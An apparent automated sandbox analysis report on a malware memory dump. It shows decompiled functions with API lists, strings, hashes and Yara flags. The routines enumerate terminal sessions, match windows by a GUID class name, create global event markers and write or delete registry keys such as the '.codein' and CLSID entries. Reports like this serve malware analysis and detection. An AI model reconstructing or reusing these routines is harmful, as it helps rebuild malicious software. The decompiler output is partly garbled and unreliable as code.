										_t60 =  *((intOrPtr*)(_t64 + (_t44 + _t44 * 2) * 4));
									}
								} else {
									_t55 = _t64 + 8;
									while( *_t55 != _t60) {
										_t43 = _t43 + 1;
										_t55 = _t55 + 0xc;
										if(_t43 < _t58) {
											continue;
										} else {
											goto L12;
										}
										goto L18;
									}
									_t60 =  *((intOrPtr*)(_t64 + (_t43 + _t43 * 2) * 4));
									if(_t60 == 0) {
										goto L12;
									}
								}
								L18:
								_v296(_t64);
								if(_t60 == 0) {
									goto L20;
								}
							}
						}
						goto L24;
					} else {
						return E04ED572E(_v8 ^ _t66);
					}
				}
			}






















                                                                                    0x04ec70a9
                                                                                    0x04ec70b0
                                                                                    0x04ec70ba
                                                                                    0x04ec70c4
                                                                                    0x04ec70cc
                                                                                    0x04ec70dd
                                                                                    0x04ec70ea
                                                                                    0x04ec71e7
                                                                                    0x04ec71f8
                                                                                    0x04ec70f0
                                                                                    0x04ec70fb
                                                                                    0x04ec70ff
                                                                                    0x04ec712a
                                                                                    0x04ec712c
                                                                                    0x04ec712e
                                                                                    0x04ec7136
                                                                                    0x04ec71c7
                                                                                    0x04ec71cc
                                                                                    0x04ec71d4
                                                                                    0x04ec71dc
                                                                                    0x04ec71e0
                                                                                    0x04ec71e4
                                                                                    0x04ec71e4
                                                                                    0x04ec71e0
                                                                                    0x04ec7144
                                                                                    0x04ec714a
                                                                                    0x04ec7150
                                                                                    0x04ec7157
                                                                                    0x04ec715d
                                                                                    0x04ec715e
                                                                                    0x04ec7160
                                                                                    0x04ec7162
                                                                                    0x04ec7168
                                                                                    0x00000000
                                                                                    0x04ec716a
                                                                                    0x04ec716a
                                                                                    0x04ec7170
                                                                                    0x04ec7172
                                                                                    0x04ec717a
                                                                                    0x04ec7198
                                                                                    0x04ec7198
                                                                                    0x04ec719c
                                                                                    0x04ec719e
                                                                                    0x04ec71a1
                                                                                    0x04ec71a6
                                                                                    0x04ec71a7
                                                                                    0x04ec71ac
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec71ae
                                                                                    0x00000000
                                                                                    0x04ec71ac
                                                                                    0x04ec71b3
                                                                                    0x04ec71b3
                                                                                    0x04ec717c
                                                                                    0x04ec717c
                                                                                    0x04ec7180
                                                                                    0x04ec7184
                                                                                    0x04ec7185
                                                                                    0x04ec718a
                                                                                    0x00000000
                                                                                    0x04ec718c
                                                                                    0x00000000
                                                                                    0x04ec718c
                                                                                    0x00000000
                                                                                    0x04ec718a
                                                                                    0x04ec7191
                                                                                    0x04ec7196
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec7196
                                                                                    0x04ec71b6
                                                                                    0x04ec71b7
                                                                                    0x04ec71bf
                                                                                    0x00000000
                                                                                    0x04ec71c1
                                                                                    0x04ec71bf
                                                                                    0x04ec7168
                                                                                    0x00000000
                                                                                    0x04ec7103
                                                                                    0x04ec7110
                                                                                    0x04ec7110
                                                                                    0x04ec70ff

                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 04EC70DD
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04EC70F5
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsW), ref: 04EC7118
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSFreeMemory), ref: 04EC712C
                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000104,00000000), ref: 04EC71CC
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 04EC71DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$Version
                                                                                    • String ID: Kernel32.dll$WTSEnumerateSessionsW$WTSFreeMemory$WTSGetActiveConsoleSessionId$Wtsapi32.dll
                                                                                    • API String ID: 158333003-4205620339
                                                                                    • Opcode ID: c2bebc7413dc993c48707fae6d728179b9d4c481d049ef1a885400bfeeccaf96
                                                                                    • Instruction ID: 4bd30566df05dce2085c2c7d60216fff94e73244d0982839a11a00ab1cfde3b1
                                                                                    • Opcode Fuzzy Hash: c2bebc7413dc993c48707fae6d728179b9d4c481d049ef1a885400bfeeccaf96
                                                                                    • Instruction Fuzzy Hash: 9E31A235A0021A9BDB24CB659D45AFA77B9EF84714F1412ADD909D3200EF74FE46CE90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5180, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 112stringmemorythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E04EC5180(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
				signed int _v8;
				char _v1032;
				char _v2056;
				struct HWND__* _v2060;
				void** _v2064;
				signed int _t20;
				void** _t22;
				signed int _t33;
				signed int _t34;
				int _t44;
				void* _t50;
				char* _t53;
				void* _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				CHAR* _t61;
				struct HWND__* _t63;
				int _t64;
				DWORD* _t65;
				signed int _t66;

				_t58 = __edi;
				_t20 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t20 ^ _t66;
				_t22 = _a8;
				_t63 = _a4;
				_t50 =  *_t22;
				_v2064 = _t22;
				_v2060 = _t63;
				E04EDDAD0(__edi,  &_v2056, 0, 0x400);
				E04EDDAD0(_t58,  &_v1032, 0, 0x400);
				GetClassNameA(_t63,  &_v1032, 0x3ff);
				if(lstrlenA( &_v1032) == 0) {
					L14:
					return E04ED572E(_v8 ^ _t66);
				}
				_t53 = "5B3838F5-0C81-46D9-A4C0-6EA28CA3E942";
				_t33 =  &_v1032;
				while(1) {
					_t56 =  *_t33;
					if(_t56 !=  *_t53) {
						break;
					}
					if(_t56 == 0) {
						L6:
						_t34 = 0;
						L8:
						if(_t34 == 0) {
							_push(_t58);
							GetWindowTextA(_t63,  &_v2056, 0x3ff);
							_t59 = E04EDD690( &_v2056, 0x5f);
							if(_t59 != 0) {
								_t61 = _t59 + 1;
								if(_t50 == 0) {
									_t50 = LocalAlloc(0x40, 1);
								}
								_t64 = LocalSize(_t50);
								_t15 = lstrlenA(_t61) + 5; // 0x5
								_t50 = LocalReAlloc(_t50, _t15 + _t64, 0x42);
								_t65 = _t64 + _t50;
								GetWindowThreadProcessId(_v2060, _t65);
								_t44 = lstrlenA(_t61);
								_t17 =  &(_t65[1]); // 0x4
								E04EDDC90(_t17, _t61, _t44 + 1);
							}
							 *_v2064 = _t50;
						}
						goto L14;
					}
					_t57 =  *((intOrPtr*)(_t33 + 1));
					if(_t57 != _t53[1]) {
						break;
					}
					_t33 = _t33 + 2;
					_t53 =  &(_t53[2]);
					if(_t57 != 0) {
						continue;
					}
					goto L6;
				}
				asm("sbb eax, eax");
				_t34 = _t33 | 0x00000001;
				goto L8;
			}
























                                                                                    0x04ec5180
                                                                                    0x04ec5189
                                                                                    0x04ec5190
                                                                                    0x04ec5193
                                                                                    0x04ec5198
                                                                                    0x04ec519b
                                                                                    0x04ec51a2
                                                                                    0x04ec51b1
                                                                                    0x04ec51b7
                                                                                    0x04ec51ca
                                                                                    0x04ec51df
                                                                                    0x04ec51f4
                                                                                    0x04ec52bd
                                                                                    0x04ec52ce
                                                                                    0x04ec52ce
                                                                                    0x04ec51fa
                                                                                    0x04ec51ff
                                                                                    0x04ec5205
                                                                                    0x04ec5205
                                                                                    0x04ec5209
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec520d
                                                                                    0x04ec5221
                                                                                    0x04ec5221
                                                                                    0x04ec522a
                                                                                    0x04ec522c
                                                                                    0x04ec5232
                                                                                    0x04ec5240
                                                                                    0x04ec5254
                                                                                    0x04ec525b
                                                                                    0x04ec525d
                                                                                    0x04ec5260
                                                                                    0x04ec526c
                                                                                    0x04ec526c
                                                                                    0x04ec5276
                                                                                    0x04ec5280
                                                                                    0x04ec528d
                                                                                    0x04ec528f
                                                                                    0x04ec5298
                                                                                    0x04ec529f
                                                                                    0x04ec52a7
                                                                                    0x04ec52ac
                                                                                    0x04ec52b1
                                                                                    0x04ec52bb
                                                                                    0x04ec52bb
                                                                                    0x00000000
                                                                                    0x04ec522c
                                                                                    0x04ec520f
                                                                                    0x04ec5215
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec5217
                                                                                    0x04ec521a
                                                                                    0x04ec521f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec521f
                                                                                    0x04ec5225
                                                                                    0x04ec5227
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetClassNameA.USER32(?,?,000003FF), ref: 04EC51DF
                                                                                    • lstrlenA.KERNEL32(?), ref: 04EC51EC
                                                                                    • GetWindowTextA.USER32 ref: 04EC5240
                                                                                    • _strrchr.LIBCMT ref: 04EC524F
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 04EC5266
                                                                                    • LocalSize.KERNEL32 ref: 04EC526F
                                                                                    • lstrlenA.KERNEL32(00000001), ref: 04EC5278
                                                                                    • LocalReAlloc.KERNEL32(?,00000005,00000042), ref: 04EC5287
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 04EC5298
                                                                                    • lstrlenA.KERNEL32(00000001,?,00000005,00000042), ref: 04EC529F
                                                                                    Strings
                                                                                    • 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942, xrefs: 04EC51FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Locallstrlen$AllocWindow$ClassNameProcessSizeTextThread_strrchr
                                                                                    • String ID: 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
                                                                                    • API String ID: 414574500-3141347713
                                                                                    • Opcode ID: eee9ad495e92c9464141284664ceabc8d990bcb554ebf3174f7b168e0db0988e
                                                                                    • Instruction ID: 936c0b1e992c750aed13ed1b3868313751c766254c7873700faf54c1a6fc5091
                                                                                    • Opcode Fuzzy Hash: eee9ad495e92c9464141284664ceabc8d990bcb554ebf3174f7b168e0db0988e
                                                                                    • Instruction Fuzzy Hash: A931F6B5A00218AFD7109F609D85FAA77FCEF84305F0050A9EB45D7241EB75BE4A8B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC9360, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 98registrythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 88%
                                                                                    			E04EC9360(void* __ebx, struct _SECURITY_ATTRIBUTES** __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				char _v616;
				signed int _t23;
				void* _t30;
				int* _t65;
				signed int _t66;

				_t23 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t23 ^ _t66;
				_t65 = __ecx;
				_push(__edi);
				 *__ecx = 0;
				E04EC6010(__ebx, _a4,  &_v88, __edi, __ecx);
				wsprintfW( &_v608, L"Global\\%s",  &_v88);
				_t30 = CreateEventW(0, 1, 0,  &_v608);
				_t65[2] = _t30;
				if(_t30 == 0) {
					L5:
					 *_t65 = 1;
					goto L6;
				} else {
					if(GetLastError() != 0xb7) {
						_v616 = GetCurrentThreadId() + 0x13c;
						wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
						_v612 = 0;
						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0) != 0) {
							goto L5;
						} else {
							RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4);
							_t62 =  ==  ? 1 : 0;
							RegCloseKey(_v612);
							__eflags =  ==  ? 1 : 0;
							if(( ==  ? 1 : 0) == 0) {
								goto L5;
							}
						}
						L6:
						return E04ED572E(_v8 ^ _t66);
					} else {
						CloseHandle(_t65[2]);
						_t65[1] = 1;
						return E04ED572E(_v8 ^ _t66);
					}
				}
			}












                                                                                    0x04ec9369
                                                                                    0x04ec9370
                                                                                    0x04ec9374
                                                                                    0x04ec937c
                                                                                    0x04ec937d
                                                                                    0x04ec9383
                                                                                    0x04ec939e
                                                                                    0x04ec93b0
                                                                                    0x04ec93b6
                                                                                    0x04ec93bb
                                                                                    0x04ec947e
                                                                                    0x04ec947e
                                                                                    0x00000000
                                                                                    0x04ec93c1
                                                                                    0x04ec93cc
                                                                                    0x04ec93fd
                                                                                    0x04ec9413
                                                                                    0x04ec9420
                                                                                    0x04ec9445
                                                                                    0x00000000
                                                                                    0x04ec9447
                                                                                    0x04ec945e
                                                                                    0x04ec9471
                                                                                    0x04ec9474
                                                                                    0x04ec947a
                                                                                    0x04ec947c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec947c
                                                                                    0x04ec9484
                                                                                    0x04ec949a
                                                                                    0x04ec93ce
                                                                                    0x04ec93d1
                                                                                    0x04ec93d8
                                                                                    0x04ec93ef
                                                                                    0x04ec93ef
                                                                                    0x04ec93cc

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC939E
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 04EC93B0
                                                                                    • GetLastError.KERNEL32 ref: 04EC93C1
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC93D1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04EC93F2
                                                                                    • wsprintfW.USER32 ref: 04EC9413
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EC943D
                                                                                    • RegSetValueExW.ADVAPI32(?,04EFD09C,00000000,00000004,?,00000004), ref: 04EC945E
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC9474
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$CreateValuewsprintf$CurrentErrorEventHandleLastOpenQueryThread
                                                                                    • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 709688788-2346361075
                                                                                    • Opcode ID: 07d02ae6d485eb42bcb66b96568e4ca73cbdbda30b3b00107d2f9176742a39b2
                                                                                    • Instruction ID: 27b6342c34e0ae4fe7c4448171b946381d346e620fe4ad0998fdf9a6aa59e3ff
                                                                                    • Opcode Fuzzy Hash: 07d02ae6d485eb42bcb66b96568e4ca73cbdbda30b3b00107d2f9176742a39b2
                                                                                    • Instruction Fuzzy Hash: FA31B271600208AFDB20DFA5DC49FABB7B9EFC4701F10406AE94AE6184EB75AA44CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB63F0, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 96registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EB63F0(void* __ebx, void* __ecx) {
				void* _v8;
				void* __edi;
				void* __esi;
				void* _t17;
				void* _t20;
				intOrPtr _t21;
				intOrPtr _t27;
				void* _t37;
				void* _t40;

				_t45 =  *0x4f068d0;
				_t40 = __ecx;
				if( *0x4f068d0 == 0) {
					 *0x4f068d0 = E04EB62B0(__ebx, E04ED5744(__ecx, _t45, 0x3c), _t37, _t45);
				}
				_v8 = 0;
				if(_t40 == 0) {
					RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
					_t17 = _v8;
					__eflags = _t17;
					if(_t17 != 0) {
						RegCloseKey(_t17);
					}
					_v8 = 0;
					RegCreateKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
					_t20 = _v8;
					__eflags = _t20;
					if(_t20 != 0) {
						RegCloseKey(_t20);
					}
					_t21 =  *0x4f068d0; // 0x0
					 *((intOrPtr*)(_t21 + 0x38)) = 1;
					return _t21;
				} else {
					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
						SHDeleteKeyW(_v8, 0x4efb5d0);
						RegCloseKey(_v8);
					}
					_v8 = 0;
					if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
						SHDeleteKeyW(_v8, 0x4efb5d0);
						RegCloseKey(_v8);
					}
					_t27 =  *0x4f068d0; // 0x0
					 *(_t27 + 0x38) = 0;
					return _t27;
				}
			}












                                                                                    0x04eb63f6
                                                                                    0x04eb63ff
                                                                                    0x04eb6401
                                                                                    0x04eb6414
                                                                                    0x04eb6414
                                                                                    0x04eb6419
                                                                                    0x04eb6425
                                                                                    0x04eb64c5
                                                                                    0x04eb64c7
                                                                                    0x04eb64d0
                                                                                    0x04eb64d2
                                                                                    0x04eb64d5
                                                                                    0x04eb64d5
                                                                                    0x04eb64dc
                                                                                    0x04eb64fb
                                                                                    0x04eb64fd
                                                                                    0x04eb6500
                                                                                    0x04eb6502
                                                                                    0x04eb6505
                                                                                    0x04eb6505
                                                                                    0x04eb6507
                                                                                    0x04eb650e
                                                                                    0x04eb6518
                                                                                    0x04eb6427
                                                                                    0x04eb644d
                                                                                    0x04eb6457
                                                                                    0x04eb645c
                                                                                    0x04eb645c
                                                                                    0x04eb6461
                                                                                    0x04eb6482
                                                                                    0x04eb648c
                                                                                    0x04eb6491
                                                                                    0x04eb6491
                                                                                    0x04eb6493
                                                                                    0x04eb6498
                                                                                    0x04eb64a4
                                                                                    0x04eb64a4

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 04EB6439
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EB6457
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EB645C
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 04EB647A
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EB648C
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EB6491
                                                                                      • Part of subcall function 04EB62B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB6350
                                                                                      • Part of subcall function 04EB62B0: RegCloseKey.ADVAPI32(04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB635D
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EB64C5
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EB64D5
                                                                                    • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EB64FB
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EB6505
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$Open$CreateDelete
                                                                                    • String ID: SOFTWARE\Classes\.codein
                                                                                    • API String ID: 185900105-3041101089
                                                                                    • Opcode ID: 262d1382d3eb8de083d68dbcb3eaaa26c82e1aec80969f9cdb00a53ccdcacda8
                                                                                    • Instruction ID: bfcca393ede928b76c36bb79846bb6aeb9dcf57e3c54f2674f2811cca95e3dbc
                                                                                    • Opcode Fuzzy Hash: 262d1382d3eb8de083d68dbcb3eaaa26c82e1aec80969f9cdb00a53ccdcacda8
                                                                                    • Instruction Fuzzy Hash: ED312C70B80318BBEB20DE65EC06F9A7BA8EB80B14F341055FE45B7180D6B47E549A95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED3CC0, Relevance: 18.2, APIs: 12, Instructions: 209memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 34%
                                                                                    			E04ED3CC0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4, char _a12, intOrPtr* _a16, intOrPtr _a20) {
				signed int _v8;
				char _v12;
				char _v16;
				void* _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				signed int _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v68;
				intOrPtr _v72;
				char _v76;
				signed int _t73;
				void* _t79;
				long _t85;
				long _t89;
				long _t92;
				signed int _t94;
				signed int _t103;
				void* _t104;
				signed int _t105;
				long _t106;
				void* _t115;
				intOrPtr* _t120;
				intOrPtr _t121;
				signed int _t135;
				intOrPtr* _t139;
				long _t140;
				struct _CRITICAL_SECTION* _t144;
				intOrPtr _t146;
				intOrPtr _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;

				_t73 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t73 ^ _t149;
				_push(__ebx);
				_push(__esi);
				_v12 = _a4;
				_push(__edi);
				_t139 = __ecx;
				_v16 = _a12;
				_v28 = _a16;
				_v24 = __ecx;
				_v20 = 0;
				_t79 = E04ECC4C0(__ecx + 0xb0,  &_v20);
				_t155 = _t79;
				if(_t79 != 0) {
					_t115 = _v20;
				} else {
					_t148 =  *((intOrPtr*)(__ecx + 0xa4));
					_t115 = HeapAlloc( *(__ecx + 0x94), 0, _t148 + 0x38);
					_v20 = _t115;
					_t17 = _t115 + 0x38; // 0x38
					 *(_t115 + 0x14) = _t139 + 0x94;
					 *((intOrPtr*)(_t115 + 0x24)) = _t148;
					 *((intOrPtr*)(_t115 + 0x20)) = _t17;
				}
				_push(_v16);
				asm("xorps xmm0, xmm0");
				_push(_v12);
				asm("movups [ebx], xmm0");
				 *(_t115 + 0x10) = 0;
				 *(_t115 + 0x1c) = 0;
				 *(_t115 + 0x1c) =  *(_t139 + 0x18);
				_t140 = E04ED2430(_t139, _t155);
				_t28 = _t140 + 0x54; // 0x54
				_t144 = _t28;
				EnterCriticalSection(_t144);
				_push(_a20);
				_t120 = _v24;
				E04ED2650(_t120, _t144, _v12, _t140, _v28, _t139);
				if( *((intOrPtr*)(_v24 + 0x4c)) == 0) {
					_t120 = _v28;
					__eflags =  *_t120 - 2;
					_t85 =  !=  ? 0x1c : 0x10;
					__imp__#4( *(_t140 + 0x88), _t120, 0x10);
					__eflags = 0x10 - 0xffffffff;
					if(0x10 == 0xffffffff) {
						__imp__#111();
						goto L15;
					} else {
						_t92 =  &_v12;
						_v12 = 1;
						__imp__#10( *(_t140 + 0x88), 0x8004667e, _t92);
						__eflags = _t92;
						if(_t92 != 0) {
							goto L22;
						} else {
							_t103 = CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t92);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L7;
							} else {
								 *((intOrPtr*)(_t140 + 0x48)) = 1;
								_t104 = E04ED1D30(_v24, _t140);
								__eflags = _t104 - 2;
								if(_t104 == 2) {
									_t105 = GetLastError();
									__eflags = _t105;
									_t85 =  ==  ? 0x4c7 : _t105;
									goto L15;
								} else {
									_t85 = E04ED3700(_t115, _v24, _t140, _t144, _t140, _t115);
									_t121 = 0;
								}
							}
							goto L16;
						}
					}
				} else {
					_t106 =  &_v16;
					_v16 = 1;
					__imp__#10( *(_t140 + 0x88), 0x8004667e, _t106);
					if(_t106 != 0) {
						_push(0x80004005);
						E04EB7AB0();
						L22:
						E04EB7AB0();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t150 = _t151;
						_t94 =  *0x4f03008; // 0x3d21fb31
						_v68 = _t94 ^ _t150;
						_t135 = _v44;
						__eflags = _t135;
						_t146 = _v52;
						_v76 = _v48;
						_t98 =  ==  ? _t146 : _t146 + _t135;
						_v72 =  ==  ? _t146 : _t146 + _t135;
						 *((intOrPtr*)( *_t120 + 8))( &_v76, 1, _t144, _t149, 0x80004005);
						__eflags = _v68 ^ _t150;
						return E04ED572E(_v68 ^ _t150, _v56);
					} else {
						if(CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t106) == 0) {
							L7:
							_t85 = GetLastError();
						} else {
							_t85 = E04ECD1A0( *((intOrPtr*)(_v24 + 0x40)),  *(_t140 + 0x88), _v28, _t115);
						}
						L15:
						_t121 = 1;
						L16:
						_v20 = _t85;
						if(_t85 != 0 && _t121 != 0) {
							E04ED2560(_v24, _t140, 0, 0, 0);
							_t89 = E04ECC570(_v24 + 0xb0, _t115);
							if(_t89 == 0) {
								HeapFree( *( *(_t115 + 0x14)), _t89, _t115);
							}
						}
						LeaveCriticalSection(_t144);
						return E04ED572E(_v8 ^ _t149);
					}
				}
			}






































                                                                                    0x04ed3cc6
                                                                                    0x04ed3ccd
                                                                                    0x04ed3cd3
                                                                                    0x04ed3cd4
                                                                                    0x04ed3cd5
                                                                                    0x04ed3cdb
                                                                                    0x04ed3cdc
                                                                                    0x04ed3cde
                                                                                    0x04ed3ce4
                                                                                    0x04ed3cf1
                                                                                    0x04ed3cf4
                                                                                    0x04ed3cfb
                                                                                    0x04ed3d00
                                                                                    0x04ed3d02
                                                                                    0x04ed3d35
                                                                                    0x04ed3d04
                                                                                    0x04ed3d04
                                                                                    0x04ed3d1c
                                                                                    0x04ed3d24
                                                                                    0x04ed3d27
                                                                                    0x04ed3d2a
                                                                                    0x04ed3d2d
                                                                                    0x04ed3d30
                                                                                    0x04ed3d30
                                                                                    0x04ed3d38
                                                                                    0x04ed3d3b
                                                                                    0x04ed3d40
                                                                                    0x04ed3d43
                                                                                    0x04ed3d46
                                                                                    0x04ed3d4d
                                                                                    0x04ed3d57
                                                                                    0x04ed3d5f
                                                                                    0x04ed3d61
                                                                                    0x04ed3d61
                                                                                    0x04ed3d65
                                                                                    0x04ed3d6b
                                                                                    0x04ed3d72
                                                                                    0x04ed3d79
                                                                                    0x04ed3d85
                                                                                    0x04ed3deb
                                                                                    0x04ed3df8
                                                                                    0x04ed3dfc
                                                                                    0x04ed3e07
                                                                                    0x04ed3e0d
                                                                                    0x04ed3e10
                                                                                    0x04ed3e83
                                                                                    0x00000000
                                                                                    0x04ed3e12
                                                                                    0x04ed3e12
                                                                                    0x04ed3e15
                                                                                    0x04ed3e28
                                                                                    0x04ed3e2e
                                                                                    0x04ed3e30
                                                                                    0x00000000
                                                                                    0x04ed3e36
                                                                                    0x04ed3e44
                                                                                    0x04ed3e4a
                                                                                    0x04ed3e4c
                                                                                    0x00000000
                                                                                    0x04ed3e4e
                                                                                    0x04ed3e52
                                                                                    0x04ed3e59
                                                                                    0x04ed3e5e
                                                                                    0x04ed3e61
                                                                                    0x04ed3e71
                                                                                    0x04ed3e77
                                                                                    0x04ed3e7e
                                                                                    0x00000000
                                                                                    0x04ed3e63
                                                                                    0x04ed3e68
                                                                                    0x04ed3e6d
                                                                                    0x04ed3e6d
                                                                                    0x04ed3e61
                                                                                    0x00000000
                                                                                    0x04ed3e4c
                                                                                    0x04ed3e30
                                                                                    0x04ed3d87
                                                                                    0x04ed3d87
                                                                                    0x04ed3d8a
                                                                                    0x04ed3d9d
                                                                                    0x04ed3da5
                                                                                    0x04ed3ee4
                                                                                    0x04ed3ee9
                                                                                    0x04ed3eee
                                                                                    0x04ed3ef3
                                                                                    0x04ed3ef8
                                                                                    0x04ed3ef9
                                                                                    0x04ed3efa
                                                                                    0x04ed3efb
                                                                                    0x04ed3efc
                                                                                    0x04ed3efd
                                                                                    0x04ed3efe
                                                                                    0x04ed3eff
                                                                                    0x04ed3f01
                                                                                    0x04ed3f06
                                                                                    0x04ed3f0d
                                                                                    0x04ed3f10
                                                                                    0x04ed3f13
                                                                                    0x04ed3f19
                                                                                    0x04ed3f1c
                                                                                    0x04ed3f24
                                                                                    0x04ed3f2a
                                                                                    0x04ed3f33
                                                                                    0x04ed3f39
                                                                                    0x04ed3f44
                                                                                    0x04ed3dab
                                                                                    0x04ed3dc1
                                                                                    0x04ed3de0
                                                                                    0x04ed3de0
                                                                                    0x04ed3dc3
                                                                                    0x04ed3dd3
                                                                                    0x04ed3dd8
                                                                                    0x04ed3e89
                                                                                    0x04ed3e89
                                                                                    0x04ed3e8e
                                                                                    0x04ed3e8e
                                                                                    0x04ed3e93
                                                                                    0x04ed3ea5
                                                                                    0x04ed3eb1
                                                                                    0x04ed3eb8
                                                                                    0x04ed3ec1
                                                                                    0x04ed3ec1
                                                                                    0x04ed3eb8
                                                                                    0x04ed3ec8
                                                                                    0x04ed3ee1
                                                                                    0x04ed3ee1
                                                                                    0x04ed3da5

                                                                                    APIs
                                                                                    • HeapAlloc.KERNEL32(?,00000000,?,?,?,?), ref: 04ED3D16
